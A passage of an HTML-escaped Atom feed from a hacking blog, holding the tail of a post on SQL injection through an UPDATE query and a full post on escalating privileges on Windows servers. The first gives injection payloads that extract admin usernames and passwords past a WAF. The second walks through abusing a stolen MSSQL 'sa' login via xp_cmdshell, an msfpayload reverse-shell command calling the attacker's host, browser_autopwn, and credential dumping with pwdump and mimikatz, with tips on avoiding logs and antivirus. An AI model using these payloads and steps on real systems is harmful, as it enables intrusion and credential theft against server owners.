&lt;a href="http://www.zaslike.com/files/b9z4c7k624xoe4ll3ft.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="496" src="http://i.imm.io/145tb.jpeg" width="577" /&gt;&lt;/a&gt;&lt;br /&gt;
Screenshot of the rendered content with database answer:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.zaslike.com/files/81icqfwuctjcrb135mb7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="577" src="http://www.zaslike.com/files/81icqfwuctjcrb135mb7.jpg" width="488" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Three tables, strange !? Lets check that again.We use count.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Full query&lt;/b&gt;:&lt;b&gt;&lt;u&gt; html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Screenshot of &lt;b&gt;get tables count query&lt;/b&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.zaslike.com/files/hbljoowgdmizjojyxg.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="495" src="http://i.imm.io/145tA.jpeg" width="577" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Screenshot of the rendered content with database answer:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/mefsuuj1bsbysu3v3rrz.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="640" src="http://www.zaslike.com/files/mefsuuj1bsbysu3v3rrz.jpg" width="506" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Now is time for Burp intruder.Set browser to use &lt;b&gt;127.0.0.1&lt;/b&gt; and &lt;b&gt;8080&lt;/b&gt; for all URLs.&lt;br /&gt;
We use Burp Suite intruder with '&lt;b&gt;Attack type&lt;/b&gt;' "&lt;b&gt;Sniper&lt;/b&gt;" and '&lt;b&gt;Payload type&lt;/b&gt;' "&lt;b&gt;Numbers&lt;/b&gt;"&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Full query:&lt;/b&gt; &lt;b&gt;html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Screenshot of burp settings:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/ngduvauza1sbcd4tin5.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="386" src="http://www.zaslike.com/files/ngduvauza1sbcd4tin5.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/bgil7holekgp989ixtcj.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="396" src="http://www.zaslike.com/files/bgil7holekgp989ixtcj.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/fim14pwqh7tnfxbml8.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="427" src="http://www.zaslike.com/files/fim14pwqh7tnfxbml8.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/tif772tam8dmakbhyqu4.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="382" src="http://www.zaslike.com/files/tif772tam8dmakbhyqu4.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Thats it. And now you just get columns the same way with Burp Suite.&lt;br /&gt;
&lt;br /&gt;
Full query: &lt;b&gt;&lt;u&gt;html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Just increment &lt;b&gt;n&lt;/b&gt; with Burp Suite.&lt;br /&gt;
&lt;br /&gt;
Values :&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Full query: &lt;u&gt;html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Just increment&lt;b&gt; n&lt;/b&gt; with Burp Suite.&lt;br /&gt;
&lt;br /&gt;
That's it , simple and yet effective . I used this because , waf blocke&lt;b&gt;d -- &lt;/b&gt;and -&lt;b&gt;-+&lt;/b&gt; so I wasn't able to close and comment out query.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;About The Author&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
This article has been written by Daniel Max, He is a security researcher from Bosnia, He is willing to actively contribute to RHA.&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=sm69TYuUVlk:Godl9fmb8NQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=sm69TYuUVlk:Godl9fmb8NQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=sm69TYuUVlk:Godl9fmb8NQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=sm69TYuUVlk:Godl9fmb8NQ:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=sm69TYuUVlk:Godl9fmb8NQ:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/sm69TYuUVlk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8888596448950128805/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/05/sql-injection-with-update-query.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8888596448950128805?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8888596448950128805?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/sm69TYuUVlk/sql-injection-with-update-query.html" title="SQL Injection With Update Query" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/05/sql-injection-with-update-query.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0ECQ3c7eCp7ImA9WhBVGUQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4456024198548604877</id><published>2013-04-26T08:54:00.001-07:00</published><updated>2013-04-26T08:54:22.900-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-26T08:54:22.900-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Windows" /><title>Hacking Windows Servers - Privilege Escalation </title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-UrLtyYiYn_E/UXqi36trRRI/AAAAAAAACx8/PvMIguKthio/s1600/hacking+windows+using+linux.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="257" src="http://2.bp.blogspot.com/-UrLtyYiYn_E/UXqi36trRRI/AAAAAAAACx8/PvMIguKthio/s320/hacking+windows+using+linux.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Most of us here can hack websites and servers. But what we
hate the most is an error message- Access Denied! We know some methods to
bypass certain restrictions using the symlink, privilege-escalation using local
root exploits and some similar attacks.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;
But, these get the job done only on Linux servers.&lt;b&gt; What
about windows servers&lt;/b&gt;?&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Here are some ways to bypass certain restrictions on windows
servers or getting SYSTEM privileges.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;&lt;span style="text-indent: -0.25in;"&gt;Using "sa" account to execute commands
by MSSQL query via 'xp_cmdshell' stored procedure.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="text-indent: -0.25in;"&gt;Using meterpreter payload to get a reverse shell
over the target machine.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="text-indent: -0.25in;"&gt;Using browser_autopwn. (Really...)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="text-indent: -0.25in;"&gt;Using other tools like pwdump7, mimikatz, etc.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
Using the tools is an easy way, but the real fun of hacking lies
in the first three methods I mentioned above.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;1. Using xp_cmdshell-&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Most of the times on windows servers, we have read
permission over the files of other IIS users, which is needed to make this
method work.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
If we are lucky enough, we will find login credentials of
"sa" account of MSSQL server inside web.config file of any website.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
You must be wondering why only "sa"?&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Here, "sa" stands for Super Administrator and as
the name tells, this user has all possible permissions over the server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
The picture below shows the connection string containing
login credentials of "sa" account.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-Bw2HOfccpKI/UXqcOmOxlUI/AAAAAAAAAWs/vwJhbW0-BEg/s1600/mssql+conn.+string.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="40" src="http://3.bp.blogspot.com/-Bw2HOfccpKI/UXqcOmOxlUI/AAAAAAAAAWs/vwJhbW0-BEg/s400/mssql+conn.+string.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Using this, we can log into MSSQL server locally (using our web backdoor) &amp;amp; as well as remotely. I would recommend remote access because
it does not generate webserver logs which would fill the log file with our web
backdoor path.&lt;br /&gt;
&lt;div class="MsoNormal"&gt;
&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
So, after getting the "sa" account, we can login
remotely using HeidiSQL&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
HeidiSQL is an awesome tool to connect to remote database
servers. You can download it &lt;a href="http://www.heidisql.com/download.php"&gt;here&lt;/a&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
After logging into MSSQL server with sa account, we get a
list of databases and their contents.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-2sK-173nhw4/UXqcNh5J-AI/AAAAAAAAAWc/_CQzLGOmOis/s1600/heidi+sa+login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="207" src="http://2.bp.blogspot.com/-2sK-173nhw4/UXqcNh5J-AI/AAAAAAAAAWc/_CQzLGOmOis/s400/heidi+sa+login.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;
&lt;!--[if gte vml 1]&gt;&lt;v:shape id="Picture_x0020_2"
 o:spid="_x0000_i1030" type="#_x0000_t75" style='width:468pt;height:245.25pt;
 visibility:visible;mso-wrap-style:square'&gt;
 &lt;v:imagedata src="file:///C:\Users\r00t3r\AppData\Local\Temp\msohtmlclip1\01\clip_image003.png"
  o:title=""/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Now we can execute commands using MSSQL queries via
xp_cmdshell. (With administrator privileges)&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Syntax for the query is-&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;xp_cmdshell '[command]'&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
For example, if I need to know my current privileges, I
would query-&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;xp_cmdshell 'whoami'&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-GgtN_sahD3E/UXqcPc3mIzI/AAAAAAAAAW8/AasMUAEiBuY/s1600/query.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="111" src="http://3.bp.blogspot.com/-GgtN_sahD3E/UXqcPc3mIzI/AAAAAAAAAW8/AasMUAEiBuY/s400/query.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;
&lt;!--[if gte vml 1]&gt;&lt;v:shape id="Picture_x0020_3"
 o:spid="_x0000_i1029" type="#_x0000_t75" style='width:468pt;height:131.25pt;
 visibility:visible;mso-wrap-style:square'&gt;
 &lt;v:imagedata src="file:///C:\Users\r00t3r\AppData\Local\Temp\msohtmlclip1\01\clip_image005.png"
  o:title=""/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
This shows that I am currently NT Authority/System, which
most of us know is the highest user in the windows user hierarchy.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Now we can go for some post exploitation like enabling RDP,
adding accounts and allowing them to access RDP.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;&lt;i&gt;Note:&lt;/i&gt;&lt;/b&gt; If the server does not have xp_cmdshell stored
procedure, you can install it yourself. There are many tutorials for that online.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;2. Meterpreter
Payload-&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
This method is quite easy and comes useful when we cannot
read files of other users, but we can execute commands.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Using metasploit, generate a reverse shell payload binary.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
For example-&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130
LPORT=31337 X &amp;gt; /tmp/1.exe&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Now we will upload this executable to the server using our web
backdoor.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Now it's time to execute the payload.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
If everything goes right, we will get a meterpreter session
over the target machine as shown below-&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
We can also use php, asp or other payloads.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-INLb6GnSNZA/UXqcPMiaPeI/AAAAAAAAAW4/AP8bYiT6B3g/s1600/meterpretershell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" src="http://3.bp.blogspot.com/-INLb6GnSNZA/UXqcPMiaPeI/AAAAAAAAAW4/AP8bYiT6B3g/s400/meterpretershell.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;3. Browser Autopwn-&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
This seems odd, as a way of hacking a server. But I myself
found this as a clever way to do the job, especially in scenarios where we are
allowed to execute commands, but we cannot run executables (our payloads) due
to software restriction policies in domain environment.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Most of the windows servers have outdated Internet Explorer
and we can exploit them if we can execute commands.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
I think it is clear by now that what I'm trying to explain
;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
We can start Internet Explorer from command line and make it
browse to a specific URL.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Syntax for&amp;nbsp; this-&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;i&gt;iexplore.exe [URL]&lt;/i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Where URL would our server address which would be running
browser_autopwn. After that we can use railgun to avoid antivirus detection.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-soL_paoCfiU/UXqcMxkEr0I/AAAAAAAAAWU/CMKtk3CR88U/s1600/autopwn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="145" src="http://3.bp.blogspot.com/-soL_paoCfiU/UXqcMxkEr0I/AAAAAAAAAWU/CMKtk3CR88U/s400/autopwn.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b&gt;4. Using readily
available tools-&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Tools like pwdump and mimikatz can crack passwords of
windows users.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
#pwdump7 gives out the NTLM hashes of the users which can be
cracked further using John the Ripper.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
The following screenshot shows NTLM hashes from pwdump7:&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-IB3vfdJsnYU/UXqcPHJkgBI/AAAAAAAAAW0/rAZr1EywAdM/s1600/pwdump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="135" src="http://4.bp.blogspot.com/-IB3vfdJsnYU/UXqcPHJkgBI/AAAAAAAAAW0/rAZr1EywAdM/s400/pwdump.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
#mimikatz is another great tool which extracts the plain text
passwords of users from lsass.exe. The tool is some language other than English
so do watch tutorials on how to use it.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Following picture shows plain text passwords from mimikatz:&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-uZowchEk4cU/UXqcN48DaKI/AAAAAAAAAWg/Y7rIx3iZjWI/s1600/mimikatz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="175" src="http://3.bp.blogspot.com/-uZowchEk4cU/UXqcN48DaKI/AAAAAAAAAWg/Y7rIx3iZjWI/s400/mimikatz.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
You can google about them and learn how to use these tools
and what actually they exploit to get the job done for you.&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
I hope you can now exploit every another windows server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
Happy Hacking :)&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;About The Author&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
This article has been written by&amp;nbsp;&lt;b&gt;Deepankar Arora, &lt;/b&gt;He is an independent security researcher from India, He has been listed in various hall of fames.&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=LUI_mO7nnwc:LmPZTXoGfO4:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=LUI_mO7nnwc:LmPZTXoGfO4:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=LUI_mO7nnwc:LmPZTXoGfO4:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=LUI_mO7nnwc:LmPZTXoGfO4:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=LUI_mO7nnwc:LmPZTXoGfO4:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
